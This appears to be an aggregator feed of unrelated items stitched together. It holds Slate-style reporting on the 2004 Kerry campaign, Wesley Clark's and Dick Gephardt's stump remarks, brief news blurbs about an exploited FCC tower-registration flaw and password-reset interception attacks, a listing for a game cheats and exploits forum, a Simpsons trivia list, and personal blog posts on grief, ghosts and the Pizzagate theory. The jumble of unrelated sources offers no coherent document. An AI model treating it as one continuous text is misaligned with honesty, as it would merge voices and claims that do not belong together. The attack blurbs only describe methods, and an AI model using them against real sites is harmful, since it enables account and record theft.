Great Expectations   

PHILADELPHIA—On the Kerry plane Thursday, reporters asked Mike McCurry why the campaign agreed to make the foreign-policy debate first, as the Bush campaign wanted, instead of third, as the Commission on Presidential Debates had scheduled it. "You know, we have to take anything like that and turn it into an opportunity," McCurry said. So, you see it as an opportunity? Not quite: "I'm supposed to lower expectations, not raise them."

Maybe McCurry should tell the candidate. I counted six times this week that Kerry raised his debate expectations by disparaging President Bush's intelligence or knowledge, seven if you count a comment made by Sen. Joe Biden during a Friday rally here. During his Monday night appearance on David Letterman, Kerry said that during the debates, "George Bush is gonna sit on Dick Cheney's lap," an apparent reference to the widespread Democratic belief that the vice president is the ventriloquist/puppeteer and Bush is the dummy. (At least, I hope that was the reference.) On Tuesday's Live With Regis & Kelly, Kerry said of the just-concluded debate negotiations, "The big hang-up was George Bush wanted a lifeline where he could call," an allusion to Regis Philbin's Who Wants To Be a Millionaire? game show. That night in Orlando, Kerry said that President Bush says he would have gone to war "even if he knew there was no connection of al-Qaida and Sept. 11 and Iraq—which we knew, but even if he knew that." In Columbus on Thursday, Kerry mocked Bush's claim that the CIA was "just guessing" about Iraq in its National Intelligence Estimate by implying that the president didn't understand the nature of the report and hadn't looked at it: "It's called an analysis. And the president ought to read it, and he ought to study it, and he ought to respond to it." On Friday on the campus of the University of Pennsylvania *, Biden compared the two candidates for president by saying, "John Kerry understands and has actually read history." Earlier that morning, during Kerry's war-on-terror speech at Temple University, Kerry noted that the president agreed to testify before the 9/11 commission "only with Vice President Cheney at his side," and he ridiculed Republican claims that a new president wouldn't be able to get more allies involved in Iraq and the war on terror by saying, "I have news for President Bush: Just because you can't do something doesn't mean it can't be done."

Good lines all—well, except the sitting-in-Cheney's lap one. But was this the week to trot out the Bush-is-an-idiot-controlled-by-Cheney meme? I thought the campaigns were supposed to talk up their opponents before the debates, not deride them. Kerry is Cicero and Bush is Rocky Marciano, the man who has never lost.

Other than this minor misstep in the expectations game, however, Kerry set himself up well this week for Thursday's debate, which will be the most decisive event in the presidential campaign so far. The foreign-policy debate deserves to go first, because this is a foreign-policy election. At Kerry's town halls, even the ones that are supposed to be about health care or Social Security or the economy, the majority of voters ask him questions about Iraq. Here's one way to think about next week's face-off: Bush and Kerry are running for leader of the free world, not just president of the United States, and both candidates want to cast themselves as a global Abraham Lincoln while defining their opponent as an international version of John C. Calhoun.

Bush lays claim to the mantle of Lincoln the Emancipator: Like the 16th president, Bush believes that individual liberty trumps state sovereignty (the international version of states' rights). Sure, Saddam Hussein was sovereign, but he was a tyrant and a menace to his people, Bush says, so America's invasion was a just one. Kofi Annan says Bush's invasion of Iraq was a violation of international law, but Bush appeals to a higher law that says that some laws and some rulers are illegitimate. Bush laid out his Lincolnesque doctrine of liberty over sovereignty in his acceptance speech at the Republican convention: "Our nation's founding commitment is still our deepest commitment: In our world, and here at home, we will extend the frontiers of freedom." Bush wants to paint Kerry as a global Calhoun, a man who prefers French sovereignty to Iraqi freedom.

Kerry, on the other hand, casts himself as Lincoln the preserver of the Union (while at the same time questioning Bush's competence and highlighting the disparity between the president's "fantasy world" ideals and the "world of reality" on the ground). I don't want to overstate this, because the Republican caricature of Kerry as a one-worlder who would let France exert a veto over American security is inaccurate. But Kerry clearly believes in the international structures and institutions that have been created since World War II, and he sees Bush, shall we say, nullifying them. In this version of the story, it's Bush who is Calhoun, the man who would elevate the shortsighted rights of his state over the compact that every state has entered to promote the greater good.

This analogy, like all historical analogies, is flawed in many ways. It may be particularly unfair to Kerry, who on the stump talks about relying on allies out of pragmatism rather than idealism. But it gets at the factor that I think will determine the winner of next week's debate: Which candidate will be able to present himself as the internationalist and his opponent as the isolationist? Bush says Kerry would turn his back on the people of the world who suffer under tyranny. Kerry says Bush has already turned his back on the world and has replaced dictatorship in Iraq with chaos, not the freedom he claims.

It will be an uphill battle for Kerry. So far, he's been successful at pointing out the flaws in Bush's policies, but he hasn't convinced enough people that President Kerry's policies would be any better. And Bush's bounce out of the Republican convention showed how attractive the president's principles, if not his policies, are.

In July, voters seemed to have decided that they'd like to get rid of Bush. But when they turned their attention to his potential replacement, they were disappointed by what they discovered. The Republican convention exploited that disappointment, and now there are more undecided voters than ever—because voters found out they don't like either guy.

Bush lost the incumbent's referendum, then Kerry lost the one on the challenger. Now we don't know what we want. That's why Thursday will be so critical. For Kerry to win, he needs to argue successfully that liberty and the international order, like strength and wisdom, are not opposing values.

Correction, Sept. 27, 2004: This article originally said that Biden spoke at the University of Philadelphia. He spoke at the University of Pennsylvania. (Return to corrected sentence.)


          Wesley Clark's Loose Lips   

Whether it's true or not, Gen. Wesley Clark's rise in the polls in New Hampshire is being partly attributed to some voters having "cold feet" about former Vermont Gov. Howard Dean, especially Dean's penchant for making statements that are quickly seized upon by Fox News or the Republican Party as evidence of unpatriotic disloyalty. But Clark has the same propensity for speaking imprecisely off the cuff. Here are some statements I heard him make last week during my trip with him in New Hampshire:

Bush was "warned" about 9/11? "President Bush didn't do his job as commander in chief in the early months of his administration. He was warned that the greatest threat to the United States of America was Osama Bin Laden, yet on the 11th of September in 2001, the United States had no plan for dealing with the threat posed by Osama Bin Laden. The ship of state was on autopilot. There were good CIA officers and FBI officers and everybody doing what they'd been taught to do, but the essential leadership process of putting focus on the resources of the United States, and giving these agencies a real target and a mission, it wasn't done. At least, I think that's what the evidence will show if we ever get the results of this presidential commission, and if they've asked the right questions." (Jan. 6, McKelvieMiddle School, Bedford.)

Bush "never intended" to get Osama Bin Laden? "We bombed Afghanistan, we missed Osama Bin Laden, partly because the president never intended to put the resources in to get Osama Bin Laden. All along, right after 9/11, they'd made their mind up, I guess, that we were going to go after Saddam Hussein. That's what people in the Pentagon told me. And they capped the resources, stopped the commitment to Afghanistan, and started shifting to prepare to go after Saddam Hussein." (Jan. 6, McKelvieMiddle School, Bedford.)

There wasn't a single terrorist in Iraq before the war? "The president was not and has not been held accountable yet for misleading the American people. He is continuing to associate Saddam, Iraq, and the problem of terrorism. Yet the only terrorists that are in Iraq are the people that have come there to attack us." (Jan. 7, Town House, Peterborough.)

Fifty-five million voters are "ill-informed" dupes of the Christian right? "Now, there's one party in America that's made the United Nations the enemy. And I don't know how many of you have ever read that series of books that's published by the Christian right that's called the "Left Behind" series? Probably nobody's read it up here. But don't feel bad, I'm not recommending it to you. I'm just telling you that according to the book cover that I saw in the airport, 55 million copies have been printed. And in it, the Antichrist is the United Nations. And so there's this huge, ill-informed body of sentiment out there that's just grinding away against the United Nations." (Jan. 7, FullerElementary School, Keene.)

Does Islam need an Enlightenment or just Match.com? "Young men in an Islamic culture cannot get married until they can support a family. No job, no marriage. No marriage, unhappy young men. They get real angry, they feel real frustrated, they feel real powerless. And a certain number of them are being exploited in the mosques by this recruiting network." (Jan. 8, Havenwoods Heritage Heights senior center, Concord.)

President Bush doesn't even want to find Bin Laden? "Newsweek magazine says he's in the mountains of western Pakistan. And I guess if Newsweek could find him there, we could, too, if we wanted to." (Jan. 8, Havenwoods Heritage Heights senior center, Concord.)

[Update, 1/15/04: Click here and scroll to the bottom to read a more precise explanation of this article.]


          See Dick Run   

SIOUX CITY, Iowa—Dean season! Gephardt season! Dean season! Gephardt season! If any lingering debate remained over which presidential candidate is currently enjoying his media moment, my two days with Dick Gephardt settled it. The 20 national reporters who follow Gephardt for all or part of his campaign swing from Des Moines to Sioux City are the latest sign that not only have the leaves turned in late October, but so have the media.

I came along to witness firsthand the evidence for something I wrote earlier this month after the Phoenix debate, that Gephardt's hard-nosed and well-organized Iowa campaign presents, at the moment, the biggest obstacle to President Dean (or, to be fairer, Democratic Nominee Dean). But I missed the media conspiracy memo that told everyone else to show up, too. During Gephardt's weekend swing in Iowa two days before, only three national reporters trailed the candidate. But now, David Brooks is here. So are Mara Liasson of NPR and Carl Cameron of Fox News. Throw in reporters from ABC, MSNBC, Knight Ridder, the Atlanta Journal-Constitution, the Christian Science Monitor, Newsweek, and the New York Times. (Counting Brooks, on Wednesday there are two New York Times writers following Gephardt.) Just for the sake of overkill, there are reporters from the British press and from Japanese television along for the ride. At one event in Pocahontas, Iowa—a town with an absolutely gigantic statue of the Indian princess outside her teepee welcoming visitors from the highway—the number of journalists nearly matches the number of prospective caucus-goers.

The Gephardt campaign pushes its slow-and-steady-wins-the-race angle (or is it a plea for votes from Maryland Terrapins alums?) by emblazoning "Fear the Turtle!" on the front of the press itinerary, complete with a little clip-art turtle on every page. The packet includes the latest Iowa poll results, which show Gephardt and Dean in a statistical tie for the lead, with Kerry and Edwards lagging behind. For good measure, the campaign throws in last week's favorable press clippings, including Des Moines Register wise man David Yepsen's assertion that Gephardt is the Iowa front-runner and that Dean has "plateaued" in the state. Also enclosed is a much-discussed Washington Post report—distributed, in truncated form, to voters at campaign events—that Gephardt is the candidate "many prominent Republicans fear the most." Not included is a delicious metaphor for Gephardt supporters to latch onto: While hurtling from campaign stop to campaign stop in Iowa over the past few months, the Dean van has been pulled over multiple times for speeding.

At his first stop, a senior center in Des Moines (the first of three consecutive senior centers visited by the campaign), Gephardt is supposed to deliver a "health policy address," but it turns out to be a rehash of old Howard Dean quotes about Medicare. (Later, while being ribbed by reporters about the false advertising, Gephardt's Iowa press secretary, Bill Burton, protests that he never called it a "major" policy address.) The newest wrinkle: Gephardt wants to paint the 1997 balanced budget accord—generally thought to be one of President Clinton's major accomplishments, and one supported by Dean—as a "deep, devastating cut" in Medicare.

While Gephardt speaks in front of a sign that reads "Protect Social Security" and "Protect Medicare" over and over, like computer-desktop wallpaper, I wonder: Does he really want to play this game? Dredging up old quotes and votes about Gephardt's onetime conservatism is what helped to derail his '88 campaign. He voted against the establishment of the Department of Education. He voted for a constitutional amendment to ban abortion. He voted to means-test Social Security and to eliminate cost-of-living adjustments from the program. He voted for Reagan's 1981 tax cuts. He opposed an increase in the minimum wage. Does a man with a legislative record this long and varied really want to ostentatiously declare, "There are life-and-death consequences to every position taken and every vote cast"? If that's so, how many times was Dick Gephardt on the side of death?

For now, however, it's a more recent House vote that's preventing Gephardt from running away with the Iowa race. At nearly every campaign event I attend, Gephardt is forced to deliver, in effect, two separate stump speeches. The first is the one he would like the campaign to be about: universal health care, jobs, and the immorality of rapacious multinational corporations. Gephardt's not anticapitalist: "Capitalism is the best system," he says in Pocahontas. "But capitalism has to have rules, so the capitalists don't destroy the very system" they benefit from.

He describes his visits to Mexico, China, and India, where workers live in the cardboard boxes used to ship the products they make. "I smelled where they live," he says. They live without electricity, without running water, with raw sewage running down the streets and next to "drainage ditches filled with human waste." "They live in worse conditions than farm animals in Iowa," he continues. "This is nothing short of human exploitation, that's what it is, for the profit of some special interests in the world." I'm not sure I agree with Gephardt's proposed solutions—though I'm intrigued by his notion of a variable international minimum wage—but there's no denying that he's a powerful critic of global capitalism's excesses.

Then, once Gephardt has finished and the applause has subsided, almost invariably a voter raises his hand to ask: What about Iraq? Was this war about oil? How can we recover the world's respect? How can we pay for all your programs with a war on?

At this point, Gephardt is forced to unveil stump speech No. 2. Sept. 11 changed everything, he says. Government's highest obligation is to protect American lives. In a Gephardt administration, the highest priority would be to prevent a nuclear device—"dirty or clean"—from going off in New York, Los Angeles, or Des Moines. That's why he decided Saddam Hussein needed to be removed. He supported the war because he believed the estimates of the CIA and the warnings of former Clinton administration officials, not because he listened to President Bush ("I would never do that").

Slowly, Gephardt's defense of his vote for the congressional war resolution transitions into a critique of the president. Though in an interview he insisted that the president was smart, on the stump he's not shy about insinuating that the president (whom he often refers to as "Dubya") is stupid. "He's incompetent," "He frightens me," "He's hard to help," I told him America founded the United Nations because "I wasn't sure he knew the history," and "If you'd been meeting with him every week since 9/11, you'd be running for president," too. Because Bush refused to negotiate with Kim Jong Il, North Korea is now "weeks away" from producing nuclear bombs. Bush abandoned the peace negotiations between Israel and Palestine, saying, "It's not our problem." He's arrogant. He doesn't play well with others. By the end, people are satisfied enough with Gephardt's explanation, and maybe even a little terrified, but you get the sense that they're not enthused by it.

But Gephardt isn't counting on enthusiasm. He has a couple edges on Dean, in addition to his obvious union support. For one, a surprising number of Iowa Democrats just don't like the former Vermont governor. The opposition to Gephardt tends to be substantive, based on his support for the war or his failure as Democratic leader to enact a more Democratic agenda. But the opposition to Dean is stylistic, or maybe even cultural. In socially conservative Iowa, sometimes you hear it whispered: Where's Dean's wife? Before Gephardt arrives at an event in the town of Ida Grove, I overhear a woman grumble about Judith Steinberg's refusal to campaign for her husband. "I can't get used to that," she tells her companion. "It's supposed to be a family thing."

By the same token, Gephardt never fails to mention the "church loans" and "church scholarships" that allowed him to attend Northwestern and then Michigan law school. He also refers to his son, Matt, who survived prostate cancer as an infant, as a "gift of God." I don't think I've ever heard Howard Dean say the word "God" in reference to anything.

Just before the last stop in Sioux City, I'm granted a 10-minute ride-along interview with Gephardt. I've got a number of questions, but the one I really want an answer to is this: If balanced budgets and free trade—two things that don't get a lot of emphasis in the Gephardt platform—weren't the secrets of the Clinton economy, what were? Higher taxes for the rich? Gephardt explains that the '97 budget accord wasn't needed to balance the budget, and then he tries to explain why Bush's steel tariffs—which Gephardt supported, and which made the United States lose manufacturing jobs—aren't analogous to the retaliatory tariffs Gephardt wants to be able to impose on foreign products or factories that don't comply with minimal labor and environmental standards. Soon enough, we're so sidetracked that I've forgotten entirely what we were talking about.

But afterward, when I'm once again following Gephardt in my rental car, I'm left with my question: Clinton balanced the budget and promoted free trade, and the economy boomed. President Bush ran up enormous deficits and put new restrictions on trade, and the economy sputtered. Isn't Dick Gephardt's plan closer to President Bush's?


          How A Contractor Exploited A Vulnerability In The FCC Website   
RendonWI writes: A Wisconsin wireless contractor discovered a flaw in the FCC's Antenna Structure Registration (ASR) database, and changed the ownership of more than 40 towers from multiple carriers and tower owners into his company's name during the past five months without the rightful owners being notified by the agency, according to FCC documents and sources knowledgeable of the illegal transfers. Sprint, AT&T and key tower companies were targeted in the wide-ranging thefts... Changing A ...
          Account Registrations Enable 'Password Reset Man In The Middle' Attacks   
"Attackers that have set up a malicious site can use users' account registration process to successfully perform a password reset process on a number of popular websites and messaging mobile applications, researchers have demonstrated." Orome1 quotes Help Net Security:The Password Reset Man in the Middle attack exploits the similarity of the registration and password reset processes. To launch such an attack, the attacker only needs to control a website. To entice victims to make an account on t ...
          Strategy-Freaks Forum   
Subscription-based cheats and exploits forum for World of Warcraft, Lineage 2, Dungeons and Dragons Online and Guild Wars.
          11 Weird Facts About The Simpsons That Will Make You Say 'Aye Caramba!'   

1. The Original Showrunner Thought It Wouldn't Last Past Season One

undefined

The Simpsons is one of the longest running shows of all time, and a lot of that has to do with the fact that it's the greatest television show ever made period. (If you disagree, I hate you...) Ironically, this might be due to the fact that the show's original showrunner, Sam Simon, didn't think that the show would make it past season one. When in the writer's room, Simon was said to tell his employees that their fledgling show would be "13 and out," meaning that the show probably wouldn't return after its initial order.  Though this way of thinking annoyed series creator Matt Groening, who view Simon as being a defeatist, Simon claims that he was actually just trying to make the best show he could. By making the writers believe the show had no future, it allowed them to focus on the sole goal of making 13 great episodes of television that they would be truly proud of. This arguably contributed to the show's quality which, in turn, contributed to the show's unfathomable popularity. Apparently, focusing on quality is a good way to make something that's actually good. Who woulda thunk it?

 

2. Marge's Hair Used To Hide Secrets...Incredibly Stupid Secrets...

undefined

Matt Groening is responsible for some of the greatest television ever created. It's weird therefore that his instincts about his own properties are often....odd. Take for example the story behind Marge's iconic hairdo. It's pretty well known at this point, but it's worth noting because MATT GROENING ORIGINALLY WANTED TO REVEAL THAT MARGE WAS A FUCKING BUNNY RABBIT! Matt Groening came to prominence with the comic strip Life In Hell and it seems to have taken him a while to realize that once The Simpsons came along, nobody could give less of a shit about his stupid comic. As such, Groening wanted to reference the strip (which prominently featured rabbits) by having Marge take down her beehive and reveal a pair of bunny ears underneath. Sam Simon quickly shot down the idea because, well, he wasn't a psychopath, but there's an alternate universe  where the greatest show in history was ruined by the stupidest reveal conceivable.

 

 

3. There's A VERY Dirty Easter Egg In Apu's Alma Mater

undefined

The Simpsons writers can cram so many jokes into a single frame that it would be impossible for a mere mortal to catch them all. This was the case with the episode Much Apu About Nothing. In it, Apu gives the story about how he came to be an illegal alien living in America. One of the thing he mentions is the fact that he studied at Springfield Heights Institute of Technology. It's a small moment, and one that you're probably not likely to take a second glance at...at least that was the case with censors who didn't notice that the initials for Apu's university spell out "SHIT." Is this the most clever thing The Simpsons has ever done? Not by a long shot. But it's always fun to see just how deep the show's humor can get.  

 

4. Manjula Appeared In A Flashback TWO SEASONS Before Her Actual Debut

undefined

Speaking of Much Apu About Nothing, there's another fun easter egg in there. The episode predicted more than just America's rise towards jingoistic nationalism: It actually gave us our first glimpse at Majula two seasons before her proper debut. When Apu is telling his story about leaving India, he includes a part where he bids goodbye to a young girl and apologizes for not being able to marry her.  To people watching the show at the time, it seems like a small, mildly racist joke, but two seasons later the little girl returns as Apu's now adult, arranged wife, Manjula. Majula then goes on to be a fairly major character on the show, with several episodes revolving around her and Apu's relationship....none of those episodes are particularly good and she's arguably the most banal character in the entire series, but it's still a fun easter egg nonetheless.

 

5. Milhouse Is Named After History's Greatest Monsters

undefined

Millhouse is an unfortunate little guy and as such, the writers wanted to give him "the most unfortunate name" they could think of. They settled on Millhouse after Richard Nixon's middle name. You may think that things couldn't get worse than being named after history's jowliest president but you'd be very wrong. The other parts of the character's name come from much darker people. For starters, his last name, Van Houten, comes from Leslie Van Houten. If you don't know, Leslie Van Houten was a murderer from the infamous Manson Family, and was the youngest woman to ever be sentenced to death in California. As if that weren't bad enough, later on in the show's run, it was revealed that Milhouse's middle name was "Mussolini." This is, of course, a reference to Benito Mussolini, who if you don't know who that is....well, let's just say he did some very bad things as well. This is all to say, poor Millhouse.

 

 

6. The Couch Gags Serve More Purpose Than You Realize

undefined

One of the most iconic parts of The Simpsons is their couch gags which are different every episode...You know, except when they aren't. Fans of the earlier episodes might notice that there's one couch gag that's reused more than all others. It features the family in a circus setting and is noticeably longer than most other openers. Why is this the one that gets recycled, you ask? Well, let's just say that when you're creating something as jam packed and ingenious as The Simpsons it can be hard to reach the minimum required runtime. As such, they would often use the nebulous nature of the couch gag to pad out an episode, piping in elongated ones like the one at the circus as they needed. Basically, even the filler on The Simpsons is better than most other things on TV.

 

7. Dustin Hoffman Is Credited With A Very Funny Pseudonym

undefined

One of the greatest guest stars in the history of The Simpsons  was Dustin Hoffman in the season 2 episode, "Lisa's Substitute." Strangely, despite it arguably being his most important role ever, Hoffman only agreed to do the episode if he was credited using a pseudonym. This being The Simpsons, they obviously used this as an opportunity for a joke, choosing to credit one of the greatest actors in history as "Sam Etic." If you don't get the joke, say it out loud. This name is an obvious reference to Hoffman's Jewish heritage, and possibly even his "Semitic good looks," that Lisa talks about during the classic episode.

 

8. Moe Didn't Get His Last Name Until Season 6

undefined

Moe is one of the greatest characters in a show full of great characters. He's popular enough that most of you would probably know the answer if I asked you to say his last name. What you may not know is that he didn't get that last name until season 6 for the sole purpose of throwing off the audience. In the epic two parter, "Who Shot Mr. Burns?", the major clue as to the identity of the shooter revolved around the fact, after being shot, Mr. Burns passed out with his arms pointing to the W and the S of the town sundial. undefined

To create multiple viable suspects, the writers played up the possible involvement of anyone whose name might involve those initials. As such, to throw Moe into the mix, they showed his liquor license revealing for the first time that his last name was Syzlack. This gave him initials that lined up with the clue from the sundial and made some internet nerd probably lose his shit thinking he'd cracked the code of who shot Mr. Burns, before ultimately punching a hole in his computer screen when he found out it was Maggie.

 

9. Two Members Of The Main Family Have Been The Subject Of TV Movies

undefined

One of the fun parts about The Simpsons is that the family's exploits can grow so large that they actually make national news within the world of the show. This can be seen in the fact that both Homer AND Bart have been the subjects of two unrelated, made for TV movies. The first of these focused on Bart after he was accused of murdering Principal Skinner. The film was aptly called Blood on the Blackboard  and it starred a young child actor named Neil Patrick Harris as Bart.

Three seasons later, Homer got the TV movie treatment himself when he was accused of sexual harassment. His film was called Homer S: Portrait of an Ass-Grabber and it starred Dennis Franz as the title role. So, if you're ever curious what the writers think a real world Homer would look like, it's this: 

undefined

source 

 

10. The Simpsons Actually DO Go To Delaware

undefined

The season 11 episode, Behind The Laughter, was an off the wall, meta-masterpiece that also probably should have served as the show's series finale. Unfortunately, it did not and the show returned season after season to diminishing returns. In a humorous nod to the show's apparent decline in quality, one of the last scenes episode, we see Homer in an editing room watching  a cut of an episode in which Lisa excitedly declares, "The Simpsons are going to Delaware!" It's funny because no show would actually base an episode on the family winning a trip to the most boring state in the union...except, they totally do!

Exactly one season later, The Simpsons do, in fact, win a trip to Delaware! The show reuses the audio that was presented as an example of the show's lack of ideas and work it into an actual episode. Granted, it's clearly done ironically and the majority the episode is an anthology about tall tales, but the instance is still fun to think about. Not only is it a fun callback to an earlier episode, but it also seems to serve as infuriating evidence that even the writers knew that the show was beginning to lose its luster.

 

11. You Can Apparently Find Waldo Hiding In Springfield

undefined

The Simpsons is so jam packed with references that watching it can you're reading a Where's Waldo book....Sometimes, literally! The classic children's character has shown up as a sight gag on at least two unrelated occasions.

The first of these occurs in the episode "Bart's Comet" when the entire town of Springfield is crammed into a tiny bomb shelter. See if you can spot him:

undefined

The bestriped traveler appears again a few seasons later in the episode "Hello Gutter, Hello Fadder." Homer plays looks at a Where's Waldo? book and fails to find him, only to have the actual character walk around behind him outside the kitchen window: 

undefined

So, is the show trying to tell us that Waldo exists in the world of The Simpsons and is, in fact, a resident of Springfield? No of course not. These are clearly just two unrelated sight gags...A guy can dream, though.


          Le Z2 Play de Motorola est plus puissant que son prédécesseur   
On se souvient du Z Play, un smartphone qui avait connu un grand succés, Motorola (depuis racheté par Lenovo) renouvelle l'exploit avec le Moto Z2 Play, un téléphone plus puissant que son prédécesseur...Le Moto Z2...
          Réalité virtuelle: le casque Playstation VR a passé le cap du million d'exemplaires vendus   
Sony, qui connaissait déjà un succès insolent dans le domaine des consoles, peut aussi se vanter de renouveler l'exploit dans le secteur de la réalité virtuelle. Sony a en effet vendu plus d'1 million de casques en...
          For the Faithful Not-Quite Departed   


When I was a kid I really tuned into the whole Holy Week thing. Aside from Christmas it seemed to be the only time of the year when there was an actual story being told, a compelling focus for all the ritual and sermonizing we had to put up with all year. Sunday School met in the chapel for much of Lent into Easter, and the chapel was like a secret, hidden little mini-church in which kids ruled.

But there was something else that struck me about Holy Week. There were these little vent windows in the stained glass displays and they were usually left open, since the chapel tended to get awfully warm. And I would sit by the window and take in the intoxicating-- and irreducibly pagan-- wholeness of Spring. 

When I was a kid I spent most of my playtime outdoors, often exploring the woods behind our neighborhood. I walked to school until I got to 9th grade. I tuned into the sights, sounds, and perhaps most importantly, the smells of the natural world in a way adults are incapable of. I was able to process all of this sensory input in a way I would never be able to again, because everything was rich, new, unknown and alive.

Spring also meant baseball, which we residents of Red Sox Country took as religion. We'd play until the cold hurt your hands when the bat connected, then mess around with a football for a little while until the ponds froze and it was time for hockey. Baseball meant little league, when Watson Park turned into a city of kids every evening. It was there that I was initiated into the deeper mysteries of Spring.

But Easter was also a story of resurrection, a story that long predates Christianity. It's probably one of the oldest stories we have. But it's also a story of the Dead.

I understood the resurrection story, its power and its emotional appeal. When I was eight years old I lost someone very close to me, someone who died far too young. And died violently. It happened three days after Christmas, just because Fate is at heart a fucking sadist. (I still remember playing with my new GI Joe training center in the basement when my mother called me upstairs to break the news).  In many ways, my childhood died then and I spent far too much time trying to claw it back later.

This boy was touched by the gods, everyone thought so. Even adults recognized the power of his charisma, his natural charm. He was a natural born leader, other kids just naturally fell in behind him. But most of all, he was a genuinely good person who understood his power over others but never tried to exploit it.    

His death tore a hole through my family. Things I took for granted were going to slowly change, and something important was going to be taken away from me. So his death wasn't just a single tragedy, a focal point in time. It was to have repercussions for my human ecosystem. 

The dead boy haunted my dreams for years. You know how it is- you lose someone and they return to you in your dreams, explaining that it was a big misunderstanding, they were still alive and well. In one dream he came back dressed like an astronaut. I met him by the grape orchard in my neighbor's yard. He told me didn't die, that he just had been in outer space. How's that for symbolism? I can still picture that dream, better than yesterday.

So, yeah, the story of a charismatic young man rising from the dead and returning to his friends and family had tremendous resonance for me. Add in the magic of Springtime, which promised a banquet of baseball and Cheap Trick records (and hopefully, girls) and you're looking at an admixture that Medieval alchemists would have sold their souls to replicate.

There are lots of theories about the Easter story. It's just a rewriting of the passions of Pagan fertility gods. A double died on the cross or the death was faked. It was a mass hallucination. Jesus's ghost appeared to the Apostles. Plus, the old standby- aliens. 

I'm not going to litigate the debate here. It's besides the point. Because the Easter story spoke- and speaks- to generations of people who experienced loss and more than anything, wished that loss could be undone.   

Death has insinuated itself back into my human ecosystem. A while back, I told our Gordon that I sensed its presence, that it felt like it had entered into a holding pattern overhead. This was when a family member was diagnosed with cancer, which he beat into remission like the tough little bastard he is. But that was a false dawn since Death has taken a number of trophies since then, nearly all at far too young an age.

So I know a bit about Death. More than I would like to. But I also know that Death is a functionary, a delivery man. I know that something of the human essence keeps on trucking along.

I also know about the not-quite departed. Those whose passage to the other side is blocked for one reason or other. I spent a lot of time in a house where the not-quite departed had taken up residence and had to be encouraged to leave by a professional medium. There was a time in my life when everyone I knew either knew someone else who had a ghost story, or if not, had a ghost story of their own.

The not-quite departed sometimes come to us and try to make themselves known. I think this is more common than generally understood simply because many of us don't recognize their language. For reasons we will probably never explain, they can sometimes influence our physical environment, particularly through electricity, and now, electronics. But that's just the stage show, like Jesus and his magic. 

The not-quite departed don't want to haunt our houses so much as our thoughts.

Spectrology is as reliable as UFOlogy but there are some parameters that have been generally accepted for millennia. The not-quite departed are spirits with unfinished business on this plane. They were unloved or misunderstood, or they died unjustly or too young. Of course, that just described half of the people who've ever died but there seems to be other factors at work when the not-quite departed make themselves known to the living. Some think it's environmental, that geology plays a major role in these events. That very could be, but we may also never know that for sure either.

Truth be told, haunting is a pretty compelling explanation for the Easter story. If you're so inclined, of course. You have the prerequisite geology angle with the stone tomb, the fear and guilt Jesus' followers felt making them more receptive to spectral influence, the conflicting stories, the violations of the laws of physics. Throw in some dreams, visions and fantasies and you can wrap that thing up with a bow. 

But again, that's not the selling point here. Because the pitch was that if you believed this story, your dead sons would one day return to you too. And for most of human history pretty much every family in Christendom - the world-  were pining for a dead son.

I grew up in a heavily Irish Catholic neighborhood, with many first-generation immigrants*. The departed hold a special place in traditional Irish culture, as did the Easter story, certainly. The not-quite departed did as well. Given Ireland's history this certainly makes a lot of sense. It was common to see shrines to the departed in people's homes, more common in fact than shrines to the saints. I think this came out of a belief- perhaps never consciously acknowledged- that the departed were preparing the way in Heaven for the rest of us. A kind of variation on ancestor worship, if you will.

Which makes me think that the dominance secularism is currently enjoying will be short-lived. Secularism seems to be feeding into anxiety and despair among a lot of people, which in turn is leading to an epidemic of early death, from drugs, suicide or misadventure. 

I think this is a self-correcting dilemma. Trauma will inevitably lead people away from secularism- to religion, to magic, the New Age, whatever. This in turn will have a knock-on effect for the rest of the culture.

All of which is to say is that as much as we think we can sanitize death and ignore the calls of the not-quite departed, I think the inexorable laws of nature have other plans in mind.



*Martin Scorcese filmed parts of The Departed in my birth city, and cast Mark Wahlberg, whose family lives a block away from my old house 
          Spy vs Spy: Stuck in the Funhouse   

Funhouses are only fun when you can leave them. When the distorting mirror images become your new, day-to-day reality construct, then it's not so much fun anymore. 

I dreaded the 2016 Election because I had a very strong feeling that no matter who won we'd be plunged into a dystopian paradigm in which major power blocs would erupt into all-out warfare. And I sensed that neither Trump nor Clinton possessed the political skills or the communicative powers to keep the carnage fully out of our view. Or our path.


And I was right.


Trump's only been in office for a little over two months and I'm exhausted already. I'm certainly not alone in this. It all feels like a TV sitcom in its seventh season, well after the writers ran out of story ideas. The shark has been good and jumped. And the ratings (the approval ratings, in this case) are plunging too.


What is truly demoralizing though is the utter transparency of the secret war playing out, the seemingly endless spy vs spy thrust and counter-thrust, and the obvious deceptions. Even more so is the Animal Farm-like metamorphosis of the Democratic Party into a full-blown, funhouse mirror of McCarthy-era Republicans, but with Glenn Beck-worthy conspiracy theories thrown in for good measure.


I don't know about you but all of a sudden the world seems especially cold, hard, gray, harsh. Masks are coming off, velvet gloves tossed into wastebins. It doesn't seem to matter who wins the scorpion fight, you're still stuck with a scorpion.  

We can't call out the play-by-play because it's largely being acted out behind closed doors. But we can look at the collateral damage and make certain speculations. There's no doubt that it would all be just as bad-- probably worse-- if Hillary won. Even so, this all feels especially grating.

You've probably seen this story:
Conspiracy theorist Alex Jones on Friday apologized to the owner of a Washington pizzeria that became the subject of a conspiracy theory about human trafficking last year. 
Pizza shop Comet Ping Pong was thrust into the spotlight last year after a gunman allegedly fired a shot inside the restaurant. The suspect said he was investigating the unsubstantiated conspiracy theory that Hillary Clinton and her campaign chairman, John Podesta, were operating a child sex trafficking ring out of the restaurant. 
The theory, which became known as Pizzagate, had circulated among far-right conspiracy theory websites and social media accounts. 
“In our commentary about what had become known as Pizzagate, I made comments about Mr. Alefantis that in hindsight I regret, and for which I apologize to him,” Jones, who runs Infowars, said in a video. James Alefantis is the owner of Comet Ping Pong. 
Jones said his website relied on reporters who are no longer employed by Infowars and that video reports about Pizzagate were removed from the website. He also invited Alefantis onto the show to discuss the incident.
It was preceded by this story:
FBI’S RUSSIA PROBE EXPANDS TO INCLUDE ‘PIZZAGATE’ THREATS 
According to McClatchy News, the FBI’s Russian-influence probe agents are exploring whether far-right news operations, including the pro-Donald Trump sites Breitbart News and Infowars, “took any actions to assist Russia’s operatives.”  Trump’s ousted national security adviser Michael Flynn and his son, a member of the Trump transition team, were among those who boosted the so-called “PizzaGate” pedophile conspiracy theory.
I doubt this will quell the fervor among the Pizzagaters on sites like 4chan and Voat. Given the suspicion many on the fringes regard Jones with it may in fact give the flagging movement a fresh jolt. Jones' apology may also have to do with the drive to purge YouTube of "extremist" content and the controversy over the use of advertising on videos corporate clients find objectionable. A World without Sin, as our Gordon might put it. 


Washington Post headline, pre-election.

